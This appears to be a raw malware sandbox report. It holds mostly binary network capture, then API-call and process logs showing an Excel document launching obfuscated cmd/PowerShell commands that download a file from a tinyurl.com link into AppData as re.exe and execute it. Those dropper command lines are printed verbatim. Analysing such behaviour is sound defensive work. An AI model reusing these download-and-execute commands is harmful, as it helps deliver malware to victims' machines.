ًFçÏ2"ð7Äý‹æâÌ:Hׁa‚¿=rÙp^ì i$â<HãþÓåQÔ+À¡O“p™¿·Òƒni-ÈÍ¢bLC7_:v“Zúni]šÅˆÁ£‚h0‚d0U©ü²EIÁo04+هœ°%Wz0U#0€åY0‚GX̬úT6†{:µMð0Uÿ†0U%0++0Uÿ0ÿ04+(0&0$+0†http://ocsp.digicert.com0:U3010/ - +†)http://crl3.digicert.com/Omniroot2025.crl0mU f0d07 `†H†ýl0*0(+https://www.digicert.com/CPS0  `†H†ýl0g 0g 0g 0  *†H†÷  ‚|°Ž¦dráaÝót=P§çÂN &+Açð°óòÒçP€ÒÆ©º“ë¾ÁÁ†øO„¼|ær/é¶ÆviÝòjGk“T¤ €5'݊ŸÈ„—Ó´àÚ¦ðçÏ杘”ÒËÚ"wØI ¨UŽ‰ÔÒÎÐèÚàBýÎ~–„ʧÑ'Ÿ)¼ÿí.4ýF*ïNV|èÜ"—íS [º{àòO¥Y•Aͳr.\ozJC+"ËÔ? |óú|ÛJsqéÕÝF¶ž€q™ßõP~3Ò5u$^˜Z¨’Eô´Øˆ¦±déûùeHö–ÞF~Z0S]4âòñ‹•ð”ø­ã“
Data received K
Data received GAYOöb¦¢Õ!½'÷;è"¸¿ûYÑ}ØÕ(Ÿ]in}ò(ýàzä'±¢2.úÔéûDŠƒ;VƱ çLIœÂ³VÊÉ|ìN÷w‰4P­²Øã¾Û~ˆì“qÍU‰§Æ¼DÕ^VåIÓs¡d§k³µ@¢ Æw‘”óP÷P/iqâhôzqxÝTQ d@‰¬ç:€û™0‚+â$sQ9ʋ_ÀæîHmë4BZÁP0z†S^Š.…¯MNÚÚs£JX¥ÀHMFÓ]\ÚkF©…}Ž¦C« ×Ôd¬ ŽuþVöW%¨®g”q©“O“ôºUF ›þJ¿ÒÊ*Ԟ”éþXo{ÿòê[è=ãÝ0ûf3{í¡ ÊàBgLŒÇ ¶Xau*×¦O-i êD4"о ŸÿO4”˜àZÌ7j/P
Data received 
Data received 
Data received 
Data received 
Data received 0
Data received "ðy$4 OS°÷Ù8öiÖÒ+[gaua#R.~k­Ï¾#æ[ë¹·F…Þ€
Data received p
Data received ç˜&æ¶2Æá£Öv3pãÈðSU—e-]¿<î–u?îÅd´ÆØз+¦Sé½x5V¶r¾4ƒ¥ÒÓ&ïߣZbIlPÑCn‡—à2uüZúO…ªürpñ·h†Ø˜»]Ñ0$(q¶Ö*Oój¤_‰zù!Õ81Åm;lÖ-aÚÄÓ¼š„®$£>bŠ¶eí»„Vçó‘‹<­EFò(ws™BqR@–ô]¸.‚1HUoÔôÃCqÁ_½œçš[ø/¡Þ‹­Úd‹Ì…ˆ¥6°j÷{ic¸6R»¼KÓòñÙêðÁà¨ÚÇƂª9«q–«‡XC™q‡:@máI$>'>å¾µ/×´¥´Bmaj†ObjÕ>>EÅXÊ¥µBkŽKÃå šÏB¦I·Þ¯_Uú«Cü½[H£ÁK €Q«Ñ}&1ØäH©ÃÅ¿QÇ ´KÌÎAá¾Ͳ</ü¯ä?ö嬨•ñ½$ÎÇN–?ûƒæ’ õù*Ï¿r ®sÂPÿÑ]sö¨_tŠŠ䡾´øœ¸¢dÕ|Ã+)P捥¨vØ$âvì¾ø‡á³¯~:¨0…«pؾ|¹kã }7µ¡1f ²ù\©FùsÛeHt ±îNgë:z‰%s]c a>Ãú¾¥<H¥ÈI‚Oúx·Æáap|·žë3ô a‡Ÿ`?rôe¢–¸ÚaÌù$ÆŦ«'ÑM¸ç˜Á k3ÝaRcáß_>³‹¥$Ñêàš‘³xš¬;°Kíè㲅Í:dš4Ño^¾ËžDŽq°¾’sÕɐßìhæ`ªå<2øk¼~‡[ä9îFng(þfݺµæ ÂÆúÍ_2VÄòØ U1NF؂cWš&l =!—Ú0‚<šÌ›+Ã¥Á­>†ò!—PÝh‡5.ª²ëÛÑöÅõ ý„œÌ'…]ˆü˜x²¢¾(®‰xã¢æȓŠ Õ÷wjøwˆ"F9NÒïÉU)ËpÏßq?¸‰“ûHCüa£mBÐG—š+x¦ª¦Hf Ȑ(Æçäñ S #žå“U<¿z¦Çœ{Ú¼¦p{ßN>õbÆ‹ÙEýe?¾|Eå: EŸB ­&K÷s8e€’¿ç%» °Wã+ïÁQäV z.~@»ý’¨ëàšŸ¬òiQéË9ùf£Ë¯tÊ-^óe©õ˜?¬Q9(ÿ* ɅD¢PÚ~˜D"Á6 ¢÷ŠoRàB)i\™Kä0`áDèø<¿AÞx9ØÊ÷tƒï„}^ÞvËÓB "L‹1Æ] -¾âmërÇ*ù[$Dî¤bžßap6’B¥ $™Ì_«ï¢$ù¸¶©˜möê<ν(†97Aƒ«hߐÑþúvfçt#ÆF…˜(‘éôÛCKƒ§DÔ!€œÎA13K—”êÑ IaRÀl0VÊPÇIãqî?s÷x1½êû»£¢ŠÎXæë3°T‰ü²… ´HÚ΁ ÷eޏlú`7缔ÒÕñ‹P$úËôºZô=ר.÷=YŠÝTÞùžSkÌ·4ËÙaÀ¡âž©fÌxAÕþ 2¸C]%QÄëL͉å;!]týNcü¨!î^ᚁY×°Úe¹áü oŒ,ÔɯK|.ölV¨‹ÒqjDbçý;Ž¹§F ö` Àðp=íþw[3jk†¤zù\QΛYqÀ†þu^îC"·márÔmóAÄ7’•˜®û@æuó•,Üæ©´nCLnႯ ù6¿³ZøRúÒø]yšho
Data received `
Data received ¨§¦{ÕúHš|}6Çb³Í‡p¡öà¹O£—õ÷nò$Žç¢²Â|z¼1Û|å°jÑ2WAìÈ/µHœ¡tÁ=*•‡NTú2ˆ£w°éà´5_¤ÏïÎx —®
Data received 
Data received =.îÁI1&7 Ð/¤ã¤öðÂeΞ·":ýþkº(z
Data received À›âu,ϱaÎƶOؼG#R cFHÀâ%<’¾™G¾žÎùþ‰Zˆ¿þ Üg¢DÈ +Ü#φm½ö4]qmÂ&õC­kQϧÊfi#z᥀ØQsëq¼¬ª†È4²UË' |(,c‰tóˆ€ç+P3X†ñŽ:ô*¿ô\|}*U啛âIõ¨X3aÛ¸¶ ™ÖÄ Þ¤‰%0ÚäÿøcFå¥ü§Ü±ÙÏp´µ÷×Ò½ëótA‡˜I( ü0UèHs)£ÍrÙ "Ô¨MüÌ÷"Õ«fY\昸u€é|—`ҏ…#*«§õ‚¦ÑömX½#OÕÿÄ~oXQvbU Î' †Íúc…D&rO\¸)sër53ÎÌa—\“=úô“¸ÿːñ<‹ô0ÁŒdš3± u¦´¨ê”;Ù1éŽâˆ¹áLV6îm€ÞífHùH› Uùâóèë7ÄJ÷mYå;`uTTŸìLö+–CÔ¤®DºOfÝm–^º!@¬y&^®çØáV7åncÄ1īˉ~%±ãt¸²õtô`z’î/E¨V{~úRº#„¿EÑj3ͤÏJ pL©Rt‘;Õs# I€æZpGYìquIlì¸Û”Ö ‰ pz­ûŒYñF¹´I³“r"û¸&õp§ÛavOѕƒG¬¶ÿÛ ¿¦¢d"ÿ„›¹BÂÐ ^©äàk­4sӕ~ ûù€æYöå|-ȍujþªêà ¬×çðûûìnw?spåÃUž>¨øí·¨OÝñs÷z$XÚCæà1aÐWÓcV¾–T·þ¨¦9r…Z{ø0õÜVzwŸù¦k€ZÛ¤”ké9ÃaoSñÏź€àq!„½?OŠ_õcb?MÂrú€êÖ'%e2[*±Fß2[µœ*#ö[ñžñ3ȕÊHYo6´hRþ[¬ª¡¢.åRçžì/~§W ª˜ƨ'ٔø ]6Y„Ÿñ\4ðmÙëhã𨱍Χþðw’ 8ug瘴qOZ¦ -ur*€ ¨lݲMR$`ÁÀê?qZÛPV2ÌN¬¼ 1–/¶B÷™â£–òÚqrÙ0{ƒ ÅGýkQ‹2¦@ó[4=¨¾<¹©êbÇ·½ûÔ>Á1±b‚êwÃ| ïluÕ>×tEYŸ™Ó)à–£À‹#µÅŽ(ö$|Á)èÂ!>”VCc€+íVKf˜úãÕ"ï—F¼ƒËâ„Ùf¯wK‚6wv¡Ï:c~ðŠÇ¯¬.fç V6‘ȁÖ8ÒÑey:CúPe*´ ’´ÒšBÚË{柉iŒv8-%cá/¥]^þSB=ÌعõdXöâ tßB¢¬åbc AÝ®açíD‹Ø67ìíB^LpöùĤr²G˜g+å+ÀÝèµÂ³‘3ß'qÒpBR1áv­(câÛ×Tª¡3MéÈÖ;x)™‡Ó÷~°æEtî½2žº)Ä}°+¬¦ÔÞW°D£ÃÓjڃ9­9b¼>å;ø‰–ùò:Áù@¬°ÂjÝäêÿ áó‰3ýº5ˆh1ZvzM= 4-FYfZ÷BN,¾·©UyI#ÅqmHÝ ¸Ô°c$HúB¸Øu~|Ò6¢.‰9t亚ÓòÞNÃZŸqZ§ šø7ËiZl¢bU©’®°^&´s½Ô 0Ë"&™\v4wl¡ W7±_ØùŠ‰Ct" Õ½AXQ¾@2ÀGL‰H㫹iÎúb~ñ¸q Dçûà—<O‘Cäh¥¹‰
Data received à
Data received ê]ž…°t‘:Pö†O¹±Ð_*–áÙ=~è%5Aë@¡¯“9·RÐ Ô/ëy¤¸‡þ»T8½£WPƒ¹a ˜T ÖÙÉe ºÊå©Y†‡Ï ›z„ÑÕÖO=‰‘‡öÑé:äR‹ÚA—óTy¾)'踾 ÅvAuq€ºãn›°U0œ#ºxO÷ÙÝq¶ò/@â¿*u ’ˆg,S‡Ë§~IßØӏ+FÝ"ZêsNk=!jë…5csZs›¾ú[7ÌÑ7ÿ´7@í´@ýÀÞ5nkyØáߖàõ¹ ‰«Ù³¹“¨¢Æ79k.Ê=zÀŸM×q¿q£²ƒ­J2§×Òç“Ï…¡¬–Ã4Ƽé¤JAm— ,ó+ßv-¥–°<šN>ݘGM;^±Ã˜]ŠB¯Ú>æ9ú®Ä\Y·ÞΡh °+h©ô¸õI5„Ö£Úxå5/‚¾…Io^m,`FÝÞkg˜Û(#ª ¶ˆ8\Å0ë°¾›zhƒB’âû“{‰1.içœ-ûJÕS­Æœ™\]3=+^?'º‚Û !x+ µŽ sô—­ÖïûÞi•YçnfÈ¢;<f(½TS]UÌO(äa®”]Å`ö¼Om­n‡÷š ßÞÆðÎ8R[oðÌ®.›Æºµ…¨ÓEvR:J ‰ÈcJZšBŽÉd¥aŠÜþ¸ÛܵξRÑõ«]!Ú:¨VLK„/ò´ÿ^<a $ä} sëéø«Ô`ĸ9LøaKJâÚîJe% 䅻¾ÿ_‹ptø'ûCæ­sX?ZÛò0Jÿ©0Ê$µE3:<™â¢Úöuf 9zE¹E4"ìñÕ납“&¯!d–§ÛgY%÷˜ËWµ‡l;;®ˆìXwó€d_QÚo¥ÅÄV"%ùèbÔ¤þgOvó‹ŒÅ_!EÓn&J»p9ɑ&‘<ô
Data received <äUÌûNFy®«:Œ“/snŸ¤;f$ Gj<ÁO ¹§a섭ˆ‘T±Û±ÒÎÿJ 4a¿ÔC~L²›YeèObÊDÓ¦T6ûÑP日_ ¿Ý€Þ\¾s¤š`sÆAû­Ùô &™Áûãl*›Ñþ‰£­‰2Ĝ¨œnŒÅڇäêöÄöˌnÚYdí"ZÔ û˜OÈÊòǖ/r}ó îÊ"Eî lS¬¹wí0œbÊ5YœÑ£_̘àË¥Š‹|ÀφáV[7ìâçgÍ!œ˜òKšb 6•Ê +´oكââŠ3Ö~Ó܁žPuÖAgâƈSŒ¡‚ùwqQªHÜ{è.#<•×bÿ{]2î“D,É]GJÛȹ‰ãÍ5,ySDÔÖÖ3õ‚®€€`¹ñ ¯‹²µäŒÈKO °äŸ0'&î֌‘P©HÅeaw&ŽÐHkDMë¡îyÝèœÕHŠ/PŠ …‰p3œ C‹_*À‘øÿ €{îo†/±ý¨ñ!½º[R‰‹&¯úú=ä ø5C‰­2(.hi4Äk‘Èa…Áý1ž)¨\›ã—ëè$!ºß±eI,è*ɺ]=§4»–œäI”úw‹5ß·A¾ë'ŸÛ~þû o¶ÍT´gqә|ÙëÕd‰´œ£½ž:G\¢ áEµ]¯ý¯á4?­ÃŠ·ÅMօm@[dW ´ø7鏎¾Yù*•)BmŒ”©¥ \'hGÁ¦JQ€ŠX²d6…‹ŠÌ‹”ÄÂ..Ÿ¾wþµ†5ωÊ=OÇqáPã[I$օóêʉ¨N£ºæžpØ6£é°@j}r‡”UÛÝÃNU³o2#Êz…³ås•º–`Q}JÀX#•ó=ñ–d<»™}Ï䋓¿!EÐY 0f§%)”¡šðøDs ˜²!fFÖ¬"T®+ÔeJ–,Qô4 V³­{~¤"›´')7즪)c?,NVyªmŽ4.Ð缌ž{ÝÀì@õœvZ}òÓë=*\!%cœÎȪ®¤uê´ÄçGS×Ž«T §UÃ—7´êa°ÒÿNýá5JÆÇ:g­íÓnÛÖ~&Z]rêšnwPrij~œ@epá}å¾aÒ§´b£¹“Ž†N™uÖß½P·éohPò$ ˜Ö¦$È -BÙíZ͎΄¬ÝK !¨Õ«dG—S VŽ5DÃ`âZ“ukG9N¹7BæÕÔl#5$°´]ã„X•mºÉ[ÿ'¡@ˆJw6ŠVώœü §–üÇclˆö´‡=°6¬RvÕ«!¯xLMÞ=¤ËŽôÑHŠÃw³” ü¦Ñ™q´›+Šmÿ:â 2-Éð'·$ùÞÅãu‡ª3Ì#»õå/ÍÁϯýÀ’ô]ØÏìocý=d œ.(§­KU·µä8w5í`}vŒy*ÉàÐIk¥ºÜïK™—ëë³hs ú+óΑ/¹l¦¤˜Í(Ôp0«ŠsJŸ ­¤(©0r)ŠI®=^âdm9-ê¢ûû„Ç*¨ÞpÒ»ÍßZÔÍé@"Ú¶æ¯õö{ÿ"fXFÏÓ¤Øܲ·Ø+{u-R^è\Çe_©.Ò¹#óJϊ|?ä PÛª‹“¸ùÍyuĽâƒù›î9pj ß}TD¯Ý"Eb í-úߕ°×ñvÝQ¿B:úCüð½¥·r /{Ùi‚ÓÚâf¶“ì!VÞ²4=»²d`0íð’ÒȗË^̶®®Z˜‡>úpU„qԀh €ê
Data received œ·îUq” ÕK÷på»èÒÑ8ÌÔ0¤[· z˜a'ؐkià J®VÎô³LìҲġ?Bןî¸u³ÁìºñØòy j»û÷Ä÷†nH7°)¿LÞÜ£1UÖT]Ó»la΁{Nw10Ă9 žðƒ“ÞT–õÆ¢Qò¡'ŸAJîƒHžx¸!Dqe [4© p¬2+·0Ë0æy~tšÚ´)”c×oUquiÀÖkOlßóüDH¡} 8ã°WÛÔ\•”Òî⑵‰Ð$!F¦ þ„É%Á(SʟÉ)çb'Ä.ãä}5ß݃7Ûø ÆŠàB·ñún¹ªßZ:2=£:Zôù.‹EÓÈö“:4*_ŠM·RG®ðÛå ø‘]ô3P’¿-ô0Q ë<’# î/º ÿ^@éÜéž~¬|ÿ_Iê(ʒßrô+ûûRsG¬(ìèw6tü/ñßs/Z<ŽÕèAÿÚ¡¢&Q‡°aŠ$1± lÝb`ÎýTr֒‘Pæ÷CTi®وŠEý&<h#äÖm‰ÏGvl¸÷æ »Rk›];‹õmístÈeµjJ,°Ô‰Ð‚¤¹bntáJ.÷¸bò¥9†¤¿6j " g¿Æº ´mR7*…üTî|J5t«ï/ÊCÛ‚΄:tŸèTYIÕãÿn«‰¢¥~þB¿S‡UÚfñÌ PÉ '…•-¹ÈçÌn-.ÐÓ²K«:èËzþnE™útñ {Ÿ ™E¨©á¹a–*ž¨oæ¦7ËÆêæ7XiB慌Û[½‚Î>§ÒÉfST¤©fx²°qÇ{5Ðýšú…iĖ¡Ãwþ-nÈ)‰µe 2œ•ôŽºc¤ofíßˑÓúáUíá‹A2ñ}næ³lhnê¾ ·ÿĨ´@N^¨HíîžZ0_V!1¼¯pƒN@nB°XT^ÐE÷º+t¼bÝÿ²h¢é!þÛ6ì:öqȐ ;{*áÌú¸jøP‰R'̬™¹é0åŸB©õ>M‰=¾÷ßдX/3ªvî’Öm5Á,ó}?R,„ƒ!„È•T£xÂN¬½Ö°Ðx‘jxÑ>j{ˆŠ%ŠŠŠG{YÛ;ÓÌ pat dFÈ×ɬ‚n@>òüΏp,!tüÆá't0ç 5Əoø_uzÙ¬w˜šD"éÐ6§ +Xùšº°hùæYÉ ÒoXKèíŸ3iEP?2rÖ±,û  eZ‹q»ù’žãPÐ,G0Ó»0˜ÿýúú±;¦³Ð@o(:%åy㛋´8YÇ_ËöC¹ÌwÕøØå»Uûh·£öC¤.¿•BE[‹®˜÷âøìv¶~ᥦuD~®¿­––ß1>ZzgsÍlFÁ#ú×:aGðçÏóàd»ì$™ƒGƼ„VÊ,6/]È»d!£ÄÅÄ݁\[{"Қ1<Š³>Qíóê¥ç]³+ÉãåW¼¸ y©¤ûäªôñøÿ„Î|¶Lö~h”<„´[-[DŒöŠ"½0ôݹþÄ|\+™Þ-èÊmÇ4†Ÿž4ØQ&Æ\s—iʗlëÓʸ7”d¨T0Œ¨ µgH1ú¶gþ÷ÓIJê‹Ú»wi’Rq9̖KeÝa RËÇ¿w"òìy™Ó Ñyò“mÚø`Ú²èøÍöUÜ!Àçê:Áî• ZêM(¿ÂuüŠÞU…Ò+ÓÊöÇæÖNaà™eû¿X ×w¬6÷ÛÊ$2£:VS#ò—¯vÅ]£² †Ý¶¦’U[’ÚÓW#h0Ø5»$7˜Ñ
Data received ÙRùèÙº¨nüÑ.Ç ýÚ¨ÅÐýáâŸÞö9zà¸÷K?ñJ2\´\¿ æó^b݉¾îÞÿHŸJñBVv\M{0KŽ"«ïKJ&ÐíÐÈq‘Ù@¦+/ü.Á<ÌSXÉM#¿>î¬vnÞxs73Ò<óõù ÿ'Á­ÕÏi™^ªôyn¤n0 Ea½¡T}¾„>²þT™  因ÙX/»Œý—ÜðjRÚ.ßKáßüsMUœÞûeS®*´GWc³<@$ßҕÿ§VåKÝz2皡Rñ &ýÂÒbäÄiÎYëeZ€ï>(bþAVP–wò|áß!’ëLýÄÜñ4ÍÖiv,¥Ý…¾ÐÞ,ÝáSò”IÐëÃB؎å£èö¬óƒÀy_Ÿá¹¥óš,_÷AE#ÔRˆ @¬Ò2#LN>i$Xɵß6ùûþBÙD.eÀ¯5rÞOI*SçDº/ °é2Y¼˜&»9]d2Kÿ°È$¸Þ5¦OÊW·m¿ïÊ|gs;ä9fF²­‘`¤YBmë‡þqÍr=æJ”aæ)Ç95÷>H"YmzoPçùø³ðGk'¤¦G[að Ò£üªù¬ÈV.RÏâ#5ÅIˆ Txšy„å®RêäTï–yòõ§VO{­ /ȧŽ Øÿ˜@‹Q©s_}ð䂈ó²ÇŠ›žüŸKx(uª^s•ù˜ÓoeŸÀkRçÿUwc¿ŠíõR§XPŠ´эUl‚•z3ÃO@ g$!ñN&gà…ÝöfIS!\ —èÊ`¡ç $]Ùòz¢Rã¤Úg"ªn&Š¢š¸#|XQ#Û=äP´É~9¼À˃ý¿¬¹ÑZ‡K‡]»gYŠŠÓ®—3XóE†¸}õÜ¹>ìWfiÌWCÕºë+À›&zZì2úq9c?HÅXÊß_š0¢­Wï$“^¨)Âè´5¦mjÉ\–fÝòy\pR9 ºwjÉ:%¬ÀpQu[’C1ˆ0±=þ<ç=оf¾åxAq[Sê+Ï/:Æ ü̓Xëçl“Mazp€`^u»iS¨€ŠßÙ}§Hˆl×µŒ’ß©ê©rًò‚a'Pý,”kcžƒ‡~5Ñ[*„e)š†ÈNªàAòs4,|,“!"3 ÿ±+‚énÌ ï*¥Ã`övÎÜ»Giв &y 0qè)ìÀ(íR°I3>†DœŠxyíLpN¾ š|Ù»bqþ#MN Íψ“<DJ²ÞÏрIÓ¬Ý ¹{v!U‚ö8Uáº#£`°“Jr4wº„s<_ä|¥ Côˆ"Š˜Ú¡¯U°iB‚"û7ykP4îC¼o'iäýOu=Œ€éiUŽxªí9‘òèôf!$0ù ¡|1èê4ûh7ÁcÏEÿYð_•ÊÔæ4iòP6ÀâÀÄó¨º<jÊ~ð™ßàWÉÄhNýäBiÊ}Ï[d"SRÜÍäòþý{å¡[=꺢›[K_bHÌT*eÁ{¥µ¼A£{LS˜ $»ôO5ÊúMV}J¸Xu áC“¥”±¨kdrsº¸Ó.¯HÞuW¬‰ÊºµHðu¼ûèÒøjQÑÝëøþ:€ V݄†®®|Œ›µ„¼–vo´Ÿl5 ‚–ï¼eœ-‘þ{~íG$õáÚU@w#££¦ð~ð¨1E,$ÊL¯Ã÷Êùøáÿ®ÛñEðSÖvœ±Iú¦)7þž”­d~R\výü!õˆ»fõ°Aâaͪ7æ/LTn‹piršj J™À7˜1uƒ8•3Íj{6gÊÂ
Data received Ð
Data received u9/ô5_8ü÷4dý5âgYÌ ]ö‘c,¢ãñ¥A«äˆ{؈ˆ²u{fþ°^øž0»tßàd©ž89§XS¡€‘ Hó®ÊÞÎðA{’}õA8'ØSBF°®*k´aˆlŸ Z™¾Ã5r“J µ-ë{¢T<Þ¼Šop(ÌptiðԘ–«[ò,߉yid©„ÓøbÛ¥?{¡hš‘J$ì”ÂèzÆ_{Bžˆ7 i‘r]lj`aÇL—™ç]U¬”|eMfˆ‡KaM2&‘醳ŒO`­°û¯ºKšX*¯¯¦Ü´z¾ûnç÷@K³ñ©¿Eµ¥—ù;{îšÀ牙ÙXw·*žÂÙ=Va¬µñýßæºpæ¥o] Å ‹¼úÀ !׊wFiq+úÍû‰„ïDsrõ- ·À‡2×Kݐ.õàË´ZR&FÃ×ó§WàÊþ㔚V]Ïï<¹Ë6OP\†UÂY¡_Vñã!Z ÃäÉóR)GÁ¼Ÿoƒ@lÄ_©i2ý7æS!EÔE[.ð~~ ºÙ‰ÊÀû‡¸ Ñ{i‚hŽeSÞj¶”ÇÑaC„çé‰ûÆÁ°Ë"°¯M÷åvð’lÜéÐýAÒëe;‡ ¦0B2ÇâV(d€¸‰N-i8×6™ôs%á…ê—+y- AÕ&,Ž~Fš–ð_²ý"Út‹yG×ÎÆ@Rÿ¹¾wo䈐øñ[œ±ÊLàYëM>5n‘‘“jÉ!–6ì €·m1£%¿!$ì«1N[µD@|Èú„G zj2¼xC"xTËÇ陣¨ÍjøÅ-îÉí:Û¤Z.¥/ >S•–’°BŠ»¨U‘-^iÇQK¸é#­l:|ø®¨\+¼€»à’J<ò  óa°ç}¦ S(¥E[çr^ÒOµ+' ¨åaø©6©V>èT0"ÌNڻڞ¿àÁ²Þ.WÉùù±ýC¾˜Ãw)l·‘¬FØjø|]®ÆT‡ÿÄ_fL•¤îöŠ<ùiŽÔ;ø;øâf߀ëD¶w ÕaǺÏ0gîû€% o*äV´ªfàZóâwñ“Y{Ê ;Œ‚bâäƒ:âs¯‡A'\è‘VŽE0_צä„sØÊüÛÁЇ60ê˜Öîk!€œëÃ÷‚Ž¬ y<çýRЋTó…”êêSj¨"kðžúJÌ1j©o`ßŽÌ ÆK?I¹ÎÛFž‹Ç Á/ÍÃowu±»˜ÞÇ<RË
Data received åápi#ÙÃԟùK¶ Òo:Wp<¯òvÚ¸TšN8ˁR
Data sent nj`l )zä`v’—†›$\<#Å<;Ý5›ˆ]göa “/5 ÀÀÀ À 28)ÿ tinyurl.com  
Data sent FBA@²üŸ9Eæ{sîÄwKrùÑÎ Ù"_œÄÍu5Ð⟈ú»«”ÑÍ{ô]ìqÖKÜѵ7úõ¸ñvÛf0Êх1a8EcÈ¢pJY|¸—駼—ô‡[â^¡Ô,†Uàk $Az/I¹¥Ò8
Data sent `¹)S©ìnâæC‚°ÖU«{T­ÑêçT¦3ŠiÌÈ}.• &ª”3¨ålѕs²dr]ó"•Dû–­•†[?Ü~cƒ×föíF猡Ў¯‘a²Ë ›Îù]
Data sent pÓ{è§ñ`vЩýB uJ¥2ÄNGúõ~Èÿªœhh'j´o\L¨”KÝ¢Á(²ÿ%tI¾~àùä,U®lê£-÷ю áÞÉrp X ¾ôqI0ôE\È­Èøz„‹ÿ¯×DÝ0þ‰Q“
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
host 172.217.25.14
file C:\Users\test22\AppData\Roaming\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
Time & API Arguments Status Return Repeated

send

 buffer: nj`l )zä`v’—†›$\<#Å<;Ý5›ˆ]göa “/5 ÀÀÀ À 28)ÿ tinyurl.com  
socket: 1420
sent: 115
1 115 0

send

 buffer: FBA@²üŸ9Eæ{sîÄwKrùÑÎ Ù"_œÄÍu5Ð⟈ú»«”ÑÍ{ô]ìqÖKÜѵ7úõ¸ñvÛf0Êх1a8EcÈ¢pJY|¸—駼—ô‡[â^¡Ô,†Uàk $Az/I¹¥Ò8
socket: 1420
sent: 134
1 134 0

send

 buffer: `¹)S©ìnâæC‚°ÖU«{T­ÑêçT¦3ŠiÌÈ}.• &ª”3¨ålѕs²dr]ó"•Dû–­•†[?Ü~cƒ×föíF猡Ў¯‘a²Ë ›Îù]
socket: 1420
sent: 101
1 101 0

send

 buffer: pÓ{è§ñ`vЩýB uJ¥2ÄNGúõ~Èÿªœhh'j´o\L¨”KÝ¢Á(²ÿ%tI¾~àùä,U®lê£-÷ю áÞÉrp X ¾ôqI0ôE\È­Èøz„‹ÿ¯×DÝ0þ‰Q“
socket: 1420
sent: 117
1 117 0
parent_process powershell.exe martian_process C:\Users\test22\AppData\Roaming\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 Start-Sleep 12; sTArt-`P`R`ocess $env:appdata\re.exe
parent_process excel.exe martian_process cmd /c po^wer^shell -w 1 (New-Object Net.WebClient).DownloadFile('https://tinyurl.com/y3psaqmm',($env:appdata + '\re.exe'))
value Uses powershell to execute a file download from the command line
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Roaming\re.exe
file C:\Program Files\Windows Journal\Journal.exe